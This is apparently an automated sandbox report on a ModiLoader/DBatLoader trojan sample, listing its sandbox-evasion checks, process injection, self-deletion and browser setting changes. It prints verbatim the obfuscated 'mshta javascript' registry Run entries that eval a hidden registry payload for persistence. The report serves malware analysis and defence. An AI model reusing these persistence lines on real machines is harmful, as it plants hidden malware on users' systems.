Malware Analysis Report

2024-08-06 14:39

Sample ID 240530-fstdrsff9y
Target 831ef50525451ce1804e77eef61cdf28_JaffaCakes118
SHA256 898d1131c18d09fe4812ecd669a7917dbc6cff5d646104b362c423e57237a1cb
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

898d1131c18d09fe4812ecd669a7917dbc6cff5d646104b362c423e57237a1cb

Threat Level: Known bad

The file 831ef50525451ce1804e77eef61cdf28_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Adds policy Run key to start application

Looks for VMWare Tools registry key

Deletes itself

Checks BIOS information in registry

Maps connected drives based on registry

Adds Run key to start application

Unsigned PE

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-30 05:08

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 05:08

Reported

2024-05-30 05:11

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:wF9Laqc=\"P6raIih8DN\";Cz0=new%20ActiveXObject(\"WScript.Shell\");OI0ZQh8U=\"zviSXHmEK\";npXL8=Cz0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4a6420cca6\\\\7e2c46ec\");SoCU6Mn=\"9pco\";eval(npXL8);BFWt2wC=\"Yj\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:EN4mq0BROq=\"atpI\";Oz06=new%20ActiveXObject(\"WScript.Shell\");JQMTSU8=\"6vkK4gp\";x4T1Mp=Oz06.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4a6420cca6\\\\7e2c46ec\");Y7PgDPv=\"FiSLqj1E\";eval(x4T1Mp);C6OPeFPwq=\"0WKmt\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:xE3YFXe=\"c\";lO2=new%20ActiveXObject(\"WScript.Shell\");t3w9yote=\"W\";t7s2Ja=lO2.RegRead(\"HKCU\\\\software\\\\4a6420cca6\\\\7e2c46ec\");xBLLzo90h=\"whk7Xos4W\";eval(t7s2Ja);OFjug1d=\"CBD\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1196 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 1196 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 796 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1600 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1960 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network


Files


Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 05:08

Reported

2024-05-30 05:11

Platform

win7-20240215-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:RKK3rR5F=\"XTc3U77RR\";Aj7=new%20ActiveXObject(\"WScript.Shell\");rpInQ76k=\"Z0KlWDA\";w0mrw8=Aj7.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4473aafa5e\\\\6ffbda80\");RPavU8dO=\"S\";eval(w0mrw8);Jymj6VjI=\"Uv3jWfYp\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ri61hmifj=\"E6\";f5W=new%20ActiveXObject(\"WScript.Shell\");z2pbtEX=\"NEqUxHikn\";yZm89e=f5W.RegRead(\"HKCU\\\\software\\\\4473aafa5e\\\\6ffbda80\");RIT4SaxCj=\"LoCpG\";eval(yZm89e);RT3mR3mvG=\"gVi6\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:NGbuezA6H=\"4vr\";C08W=new%20ActiveXObject(\"WScript.Shell\");bZkDGZ07A=\"A7zI9rX\";XMUS1=C08W.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4473aafa5e\\\\6ffbda80\");Pp9uzZTq=\"0\";eval(XMUS1);eXwH39nIfw=\"jDX8zmK7sI\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network


Files
